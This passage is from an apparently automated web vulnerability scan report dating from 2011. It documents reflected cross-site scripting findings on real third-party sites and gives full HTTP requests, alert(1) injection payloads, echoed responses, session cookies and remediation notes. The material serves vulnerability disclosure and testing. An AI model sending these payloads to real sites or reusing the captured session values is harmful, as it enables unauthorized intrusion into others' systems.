GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438= HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:42:03 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUx6oW8tRuC50eDPRl97npFuaGOMHZn11NBeN10rkeSZPQgfvVRx_vSuEVGvGk0mz1YIl66klbzDAz4DZ182Z1g2kuAlaPwudchWaGV0lrblKY0vtyrTDDdJ79GQdJGzc8AyEa7pPjYaY2Zu0yuUACJsF%7EJtE%7EioMbnns6N4y50a8cshftqy6qCLau3o8Zwemiu0KpfY0iRiilrQMFwJWssTx%7EYINE1554YiykSPZP7F0IBDazYu6U3ycZMVMfr0QLbP5KPEGQ_vEeZLeda09%7EVPWRykFc8y_ukjAbGNAMFht1JGBgjah0G2TUgQ0nSW75STNcK4H4AQoYJV7UCGSR79sTFZIQONMSPahHDaYJfXgZKzZxTmdV_GJ8hU5tlHR04ytmnxPNqwFRehwSL0RTPnZG3thL%7EVHjHZV56Eb_V85eqHkXObQD0Zm0p10961KoojryKWDSFgzM2niBSNac0fLu7K4LulL54z_WGQJduoFwvteqHRIwoYdAobOou2EW%7ExQ4oFScfPE%21; path=/; httponly RNT-Time: D=118859 t=1296697323108634 RNT-Machine: 01 F5_do_compression: yes Keep-Alive: timeout=15, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 25359
3.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3aa72</script><script>alert(1)</script>2ea59d67104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1 HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:41:08 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUgRprfxgIlvq96duxnob3hvBaWfagsAGz590%7E%7EFQxYvj6_1w_6mEciwlljmE7zfJtLqRlvR8xervxxoGDYYqCbw4kPUBcZEFoZRmrZw8QTqh4Q3urBb47qoF3Tui%7EDMuuA8SW6x111R8MaPvDpqWLDXbH2fjE%7EjAQJy%7EjpssYasVZ6HH79id9iSiVkOhJWhsMfM4PF1Frjy3wyBiwGBVx8ENPxA2o1dJ0ebJPuv5%7EJLSu504MoxpXxUSQUXU%7EseRXqvR9FJr7oB15DwsOl4WjzTn0NPd0rGO3Fas0MnPCVz9jhd8VYKFNvqPkw9jFjGI5RxmfMPs1cmyuG3nobRb1T%7EEeNs7LFMydaVYBQOOEVJ6jaF1Re9n%7EAnssEQJc50mpLkTRawP6ipl92XTouSftSuWnhiHv2QavJLs2kQPIo4CwPpvMympk9qYSFcWtVh1AzWTOSuaIE967DBi4q0x4h7xmtPl28r4A2IvoxYQCn8Q6%7E7%7EmD%7E3OVgp4HNwqM%7EBqbGGyF1_k2hY%21; path=/; httponly RNT-Time: D=104396 t=1296697268034941 RNT-Machine: 06 F5_do_compression: yes Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 25362
The value of the nsextt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547e6</script><script>alert(1)</script>cf48e18b39c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: arbor.custhelp.com Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:41:09 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUwXGkB0Q%7EkeN19jaCuImlCbnetW3JO6vRIsg9G5758NlYVaItvU5XjD2ZiX_NiVtKaJDalprrVLj6qlLlDnCI6%7Ejjft3YUnrhb1XA3YpbzwIDJ2F2nssc9F%7E_hnpNzWrw2Dt6CUNXAlY07awZQXpFjnrQoevYbR6hnrOq3wMaN9CfgNv1vGgvLQihsfZk4%7EXk_O9C4jhvJQaDoSUVbklHFGqWJ8Ap%7EA2lWYLgQn7Dj7wu5qJSZymKIh2kaAalN_A3S_oJHJCb%7EeyuIvKrxyUp17gHHKbPNbbV6LCP%7E_JdHcR19nH3J2LrLihYSYy9OqJzfMyriuylyjc%21; path=/; httponly RNT-Time: D=114429 t=1296697269254262 RNT-Machine: 04 F5_do_compression: yes Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 27211
The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload 607f7<script>alert(1)</script>42eba27e39e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000002)%3C/script%3E607f7<script>alert(1)</script>42eba27e39e HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: arbor.custhelp.com Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:41:10 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUAaKWBZ7SvvLxWfp%7EcIQfh7mPnrXi9vTZtK7WkhczqL64yYHQ0QVbkK9RHgawNIjpSCmM0Aeaz122bTrt9oxrYqquIIWDHxoUwafbHRYXpZAj8zBo%7EGLua8qDJQ%7EDYr_BEjDeAjfYtPNjYUGrMUjxkR8PpaOpu3f89vemdlgHGnpoJdFLQxsk675FBV9YqReWb3GFGXX4XBah%7EsnYmD_7SyBdqQzd3Zhql7OBAN1jNOgrekoiQBj_XTw6WLuYQmIdNS_1rGasg88i67O%7E9NukjSidUHv2Jl6I7jQxN%7EqKfSPkOD4ngpoXsEKphUlebl6j_XbSJbRExJ716aGgyN_ZtzCyzQ80dbPwgc7f72dHNu4lA3QTPUPqrVQ5_GsqIpIuQPssVxGn6wl0x3yl1rK6szqG50WB0gAY0_rSruLJlE4Xu%7EmXXJ1_cw%21%21; path=/; httponly RNT-Time: D=108020 t=1296697270345051 RNT-Machine: 03 F5_do_compression: yes Keep-Alive: timeout=15, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 27261
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b76</script><script>alert(1)</script>ea583b6f0d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:43 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUgQICmvl2w6Zo2Xi_Jx0N0VgOcbGCC8QFItCAw06VgCz3Mt4%7EGAGfyU2M%7EjB2xMg5ggHpohXV5l5rqv0jWjfN%7EJ%7E72QklUZuENaYBg1WZ4GK77t_VnZJ9ePgqpdt5qpmFeuVSPOvtFdMPJ16uULvibY1%7EVSLYegwJMunUEB4cMQWgeozPB1RX4bpdRmJfNGNYSMipIi5%7ELSfhHdeViZe0S5UhkGq95Iv1vFhIT1B7QKMrn3gv7A%7EiAr7QuieTdfnGa4tw8OQ1cUu8geqVTV4DvFNfsS4YL%7E4vTYnBb8lxnsVeT%7EC5MhQgL0Boz096TdGlDBIUF18UGjd55MRhW9CHmDXXNObd_wZ%7E; path=/; httponly Content-Length: 25622 RNT-Time: D=131773 t=1296691423739902 RNT-Machine: 07 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c521</script><a>a4238952955 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:48 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUl5Nj4RPJmKrK0ec4KoYcZ74WET9xduFZF8XJhcIYWFDJvt8YVPg5PiixPRy5Sn%7Ehiidpu8t9H6PgtJWmiJjeDFhqdz2g4M6rZvKVoR3cwoU%7EA3cXzprLyv6lvudmE_MqxYdg0wnBtp0VjGBkouhpp2g8RrZCMvI7C8uRKHyHdrhjYuH3jeP_vuoouEl7b4xlfWmNRvdchpWhQ9wzT4Bz4fIiibRbgmiM; path=/; httponly Content-Length: 25600 RNT-Time: D=113558 t=1296691428704362 RNT-Machine: 03 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f27fe%3balert(1)//63b819cf766 was submitted in the BT_PID parameter. This input was echoed as f27fe;alert(1)//63b819cf766 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/s/?BT_PID=285777f27fe%3balert(1)//63b819cf766&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 22:01:37 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: ATV1=43499dU6T3Hc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701370249&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ASB1=TX=1296684097&Pb=0&A=8&SID=077E13A179464CC6B65ADCF24D55BF62&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=2B636B63D42641EFBEA212DDAB2EF869; path=/ Date: Wed, 02 Feb 2011 22:01:37 GMT Connection: close Content-Length: 2725
var bt_ad_content285777f27fe;alert(1)//63b819cf766=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack.com.edgesuite.net/asset ...[SNIP]...
3.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://citi.bridgetrack.com
Path: /a/s/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc3b"%3balert(1)//132759f788 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9dc3b";alert(1)//132759f788 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com&9dc3b"%3balert(1)//132759f788=1 HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 22:01:48 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: ASB9=TX=1296684109&Pb=0&A=8&SID=DD8583ED0D2F43239CBC136CC3E1C6DE&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79292&Cr=98462&W=41062&Tr=41062&Cp=4112&P=285777&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701480650&S2=98462z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ATV9=33820dU6T3Tc1c40Gc8N2Hccc304Uc2DDScc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=4E30CB4C3E0A4790B2D6A833F5FD8992; path=/ Date: Wed, 02 Feb 2011 22:01:47 GMT Connection: close Content-Length: 2739
var bt_ad_content285777=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack ...[SNIP]... net/assets/98459/CITI_PlatVCR_SpecialOffer_688x153_18m_jan11.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=249747&BT_SID=101521&_u=visitor&9dc3b";alert(1)//132759f788=1&_d=http%3A%2F%2Fwww%2Eciti%2Ecom";var lf="lid=&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D249747%26BT%5FSID%3D101521%26%5Fu%3Dvisitor%269dc3b%22%3Balert ...[SNIP]...
3.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b66"-alert(1)-"9daffae2531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85e9a'><script>alert(1)</script>5b968c91723 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8785"-alert(1)-"f79d44465d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfadb'><script>alert(1)</script>b8e6b27f29e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e?_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'> ...[SNIP]...
3.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7c05"-alert(1)-"4172e4c7f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1"; ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a214f'><script>alert(1)</script>6b477eb9bf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
